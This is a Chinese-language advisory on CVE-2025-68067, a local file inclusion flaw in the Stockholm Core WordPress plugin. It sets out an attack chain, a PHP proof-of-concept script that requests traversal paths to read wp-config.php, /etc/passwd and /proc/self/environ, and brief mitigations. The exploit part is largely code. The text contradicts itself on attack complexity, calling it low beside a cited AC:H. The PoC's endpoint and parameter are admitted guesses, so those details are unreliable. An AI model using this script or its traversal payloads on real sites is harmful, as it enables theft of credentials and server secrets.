CVE-2025-68067 WordPress Stockholm Core 插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-68067

漏洞类型

本地文件包含（LFI）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Select-Themes Stockholm Core (WordPress Plugin)

漏洞概述

CVE-2025-68067是WordPress主题Stockholm Core插件中的一个高危安全漏洞，CVSS评分达到7.5分，属于高危级别。该漏洞为PHP本地文件包含（Local File Inclusion）漏洞，存在于Select-Themes公司开发的Stockholm Core插件中。攻击者可以利用该漏洞通过构造特殊的HTTP请求，读取服务器上的敏感文件，包括但不限于配置文件、数据库凭证、其他站点的数据等。由于该漏洞的CVSS向量显示攻击复杂度较低（AC:H表示高，但AV:N表示网络可访问），低权限用户即可发起攻击，且无需用户交互，因此具有较高的实际威胁性。该漏洞于2025年12月16日被披露，发现者为PatchStack安全团队的[email protected]。

技术细节

该漏洞属于PHP文件包含函数的安全问题。在PHP应用程序中，include、require、include_once和require_once等函数用于引入外部文件。当这些函数的使用不当且用户输入未被充分过滤时，攻击者可以通过路径遍历（Path Traversal）技术，诱使服务器加载恶意文件或敏感系统文件。在Stockholm Core插件中，攻击者可以通过构造类似../../../wp-config.php的路径字符串，利用目录遍历读取WordPress配置文件wp-config.php，该文件通常包含数据库用户名、密码以及加密盐等敏感信息。攻击者还可能利用此漏洞配合其他技术实现远程代码执行（RCE），例如通过日志污染或上传图片等方式注入PHP代码。CVSS向量显示该漏洞对机密性、完整性和可用性均造成高影响（C:H/I:H/A:H）。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先识别目标网站使用的WordPress版本和Stockholm Core插件版本，确认版本是否在受影响范围内（<=2.4.6）

STEP 2

步骤2

漏洞探测：攻击者访问/wp-content/plugins/stockholm-core/目录，识别存在文件包含漏洞的PHP文件入口点

STEP 3

步骤3

路径遍历构造：利用../或..\构造特殊路径，如../../../../wp-config.php，尝试读取服务器敏感文件

STEP 4

步骤4

敏感文件获取：成功读取wp-config.php获取数据库凭证、WP salts等敏感配置信息

STEP 5

步骤5

权限提升与持久化：利用获取的凭证进一步渗透，或结合日志污染、文件上传等方式实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-68067 PoC - Stockholm Core Local File Inclusion
 * Affected: Stockholm Core <= 2.4.6
 * Type: PHP Local File Inclusion
 */

$target = 'http://target-site.com';
$endpoint = '/wp-content/plugins/stockholm-core/includes/shortcodes/shortcode-elementor-template.php';

// Target vulnerable parameter (may vary based on actual vulnerable file)
$vuln_param = 'template';

// Files to attempt to read
$target_files = [
    '../../../../wp-config.php',
    '../../../../../../etc/passwd',
    '../../../../../../proc/self/environ'
];

echo "[*] CVE-2025-68067 Local File Inclusion PoC\n";
echo "[*] Target: {$target}\n\n";

foreach ($target_files as $file) {
    echo "[*] Attempting to read: {$file}\n";
    
    $url = $target . $endpoint . '?' . $vuln_param . '=' . urlencode($file);
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($http_code == 200 && !empty($response)) {
        echo "[+] Success! Content preview:\n";
        echo substr($response, 0, 500) . "\n\n";
    } else {
        echo "[-] Failed (HTTP {$http_code})\n\n";
    }
}

echo "[*] PoC execution completed\n";
?>

影响范围

Stockholm Core <= 2.4.6 (WordPress Plugin)

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）禁用或删除Stockholm Core插件；2）通过Web应用防火墙规则拦截包含../或路径遍历特征的可疑请求；3）限制PHP文件包含函数的访问权限，禁用不必要的include/require功能；4）加强对wp-config.php等敏感文件的访问控制，确保其不可通过Web路径访问。